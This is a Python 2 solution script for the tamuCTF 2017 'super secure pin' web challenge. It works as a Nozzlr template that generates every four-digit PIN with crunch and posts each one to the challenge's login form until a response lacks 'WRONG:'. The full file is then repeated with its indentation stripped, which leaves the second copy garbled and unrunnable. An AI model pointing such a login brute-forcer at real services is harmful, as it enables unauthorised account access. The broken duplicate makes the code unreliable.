intrd/tamuCTF_web100-super_secure_pin.py

## tamuCTF_web100-super_secure_pin.py
## Nozzlr template : HTTP POST bruteforcer (Solution for tamuCTF 2017 - web100-super_secure_pin)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

# generate pins wordlist using crunch: crunch 4 4 0123456789 -o pins.txt
# then.. run this template on nozzlr: nozzlr http_bruteforce.py pins.txt 20

import urllib, shutil, json
import requests

def nozz_module(payload, self=False, founds=False):
	payloads=':'.join(str(v) for v in payload.values())

	s = requests.session()

	headers = {
	    'Upgrade-Insecure-Requests': '1',
	    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
	    'Referer': 'http://pin.ctf.tamu.edu/',
	}
	result = s.get('http://pin.ctf.tamu.edu/login', headers=headers, verify=False)
	cookies=s.cookies
	#print result

	headers = {
	    'Origin': 'http://pin.ctf.tamu.edu',
	    'Upgrade-Insecure-Requests': '1',
	    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
	    'Content-Type': 'application/x-www-form-urlencoded',
	    'Referer': 'http://pin.ctf.tamu.edu/login'
	}
	postdata = {'pin': payload[0]}

	out={}
	out["code"]=""
	out["result"]=""
	code="null"
	try:
		r = s.post('http://pin.ctf.tamu.edu/login', headers=headers, data=postdata, cookies=cookies, verify=False)
		print r.content
	except requests.exceptions.RequestException as e:
		#print " "
		out["result"]=format(str(e)).strip()
		out["code"]="error"
		return out
	if "WRONG:" in r.content:
		out["code"]="NEXT"
	else:
		print payloads
		out["code"]="found: \""+payloads+"\""
	return out
	## Nozzlr template : HTTP POST bruteforcer (Solution for tamuCTF 2017 - web100-super_secure_pin)
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	# generate pins wordlist using crunch: crunch 4 4 0123456789 -o pins.txt
	# then.. run this template on nozzlr: nozzlr http_bruteforce.py pins.txt 20

	import urllib, shutil, json
	import requests

	def nozz_module(payload, self=False, founds=False):
	payloads=':'.join(str(v) for v in payload.values())

	s = requests.session()

	headers = {
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
	'Referer': 'http://pin.ctf.tamu.edu/',
	}
	result = s.get('http://pin.ctf.tamu.edu/login', headers=headers, verify=False)
	cookies=s.cookies
	#print result

	headers = {
	'Origin': 'http://pin.ctf.tamu.edu',
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
	'Content-Type': 'application/x-www-form-urlencoded',
	'Referer': 'http://pin.ctf.tamu.edu/login'
	}
	postdata = {'pin': payload[0]}

	out={}
	out["code"]=""
	out["result"]=""
	code="null"
	try:
	r = s.post('http://pin.ctf.tamu.edu/login', headers=headers, data=postdata, cookies=cookies, verify=False)
	print r.content
	except requests.exceptions.RequestException as e:
	#print " "
	out["result"]=format(str(e)).strip()
	out["code"]="error"
	return out
	if "WRONG:" in r.content:
	out["code"]="NEXT"
	else:
	print payloads
	out["code"]="found: \""+payloads+"\""
	return out